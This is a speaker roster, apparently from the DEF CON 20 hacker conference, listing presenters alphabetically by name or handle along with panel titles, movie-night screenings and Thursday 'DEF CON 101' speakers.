Gen. Keith B. Alexander
Chema Alonso
Anarchy Angel
Anch (1, 2)
Chris Anderson
Brad Antoniewicz
James Arlen
atlas
B
Adam "EvilPacket" Baldwin
James Bamford
Kevin Bankston
Michael Baucom
Rod Beckstrom
Scott Behrens
Colin Beighley
William Binney
Bitweasil
Blakdayz
Matt Blaze (1, 2)
Tobias Bluzmanis
William Borskey
Rodrigo Rubira Branco
Joshua Brashars
Sergey Bratus (1, 2)
Jonathan Brossard
Dave Brown
Francis Brown
Jeff Bryner
Elie Bursztein
Linda C. Butler
C
Thomas Cannon
Mr. Leon Carroll
Alan "Avenir" Chung
Jim Christy (1, 2)
cifo
Sandy Clark
Jonathan Claudius
Gabriella Coleman
Chris Conley
Greg Conti
Michael Copplola
Joshua Corman
Ang Cui
Cutaway
Zachary Cutlip
Catherine Crump
D
Christian "quaddi" Dameff
Darkred
The Dark Tangent
Dead Addict
Robert Deaton
Dave DeSimone
Jerry Dixon
Cory Doctorow
dotAero
Nadeem Douba
Matthew Duggan
Tom "Tdweng" Dwenger
E
Peter Eckersley
Egypt
Richard J. Enbody
esden
Amir "Zenofex" Etemadieh
F
Hanni Fakhoury
Nick Farr
Zack Fasel
Karl Feinauer
Matt Fiddler
John Floren
Andy Fried (1, 2)
FX
G
Svetlana Gaivoronski
Nick Galbreath
Martin Gallo
Eva Galperin
Dennis Gamayunov
Andrew Gavin
Kenneth Geers
Robert David Graham
Joe Grand
Jennifer Granick (1, 2)
Greg
Dan Griffin
H
Mercedes Haefer
Peter Hannay
Woody Hartzog
Shawn Henry
CJ Heres
Chris Hoff
Dustin Hoffman
Marcia Hofmann (1, 2, 3)
Ryan Holeman
I
Jon Iadonisi
Alberto García Illera
J
Jameel Jaffer
Robert E. Joyce
K
Corey Kallenberg
Dan Kaminsky (1, 2)
Dave Kennedy
Andrew King
James Kirk
Toby Kohlenberg
Xeno Kovah
Mischel Kwon
L
Anthony "Darkfloyd" Lai
Eddie Lee
Jay Leiderman
Gideon Lenkey
Katy Levinson
Andrea (Drea) London
LosT
Amber Lyon
M
Tim Maletic
David Maloney
Manu "The Sur"
Dave Marcus
Rich Marshall
David Maynor
Moxie Marlinspike
David McCallum
Wesley McGrew
Charlie Miller
Alexander Minozhenko
misterj
Tony "MT" Miu
Rich Mogull
David Mortman
Raphael Mudge
N
Fergus Noble
Jason A. Novak
O
James Oakley
Gráinne O’Neil
Omega
Kurt Opsahl
Jason Ostrom
P
Bob Pan
Nicholas J. Percoco
Michael Perklin
Tom Perrine
Larry Pesce
Dan "AltF4" Petro
Christopher Pogue
Phil Polstra
Robert Portvliet
Kevin Poulsen
Priest
R
Rob Ragan
Renderman
Jim Rennie
Ryan Reynolds
Semon Rezchikov
Riley Repko
Jeff "stoker" Robble
Michael Robinson
Carlos Alberto Rodriguez
Dan Rosenberg
S
Marcus Sachs
Patrick Samy
Bruce Schneier
Sean Schulte
Jason Scott
Rebecca "bx" Shapiro
Lisa Shay
Christopher Shields
Mickey Shkatov
Charles Smith
Christopher Soghoian
Ashkan Soltani
Aditya K. Sood
Jayson E. Street
Chris "TheSuggmeister" Sumner
T
Chris Tarnovsky
Chris Taylor
Gail Thackeray
Richard Thieme
Josh "m0nk" Thomas
Thor
Trevor Timm
Marc Weber Tobias
Ben Toews
Matthew M. Toussain
Jeff "r3plicant" Tully
V
Sergio Valderrama
Viss
Paul Vixie
W
Randall Wald
Mark Weatherford (1, 2)
Dr. Linton Wells
Paul Wilson
Ben Wizner
Kelvin "Captain" Wong
Justin Wykes
Z
Zoz
Dan Zulla
Panels and Special Interest
DCG/Hackspace Panel
ACLU Panel
DEF CON 101
Meet the EFF
Meet the Fed Panel (1, 2)
DC RECOGNIZE Awards
Panel: Making DEF CON 20
Movie Night: Code 2600
Movie Night: Reboot
Movie Night: 21
Q&A With the Men (and Women) in Black
Thursday Speakers / DC 101
DEF CON 101
AlxRogan
DaKahuna
Flipper
Hackajar
Lockheed
LosT
Ripshy
Roamer
Siviak
Terence "tuna" Gareau
Dr. Tran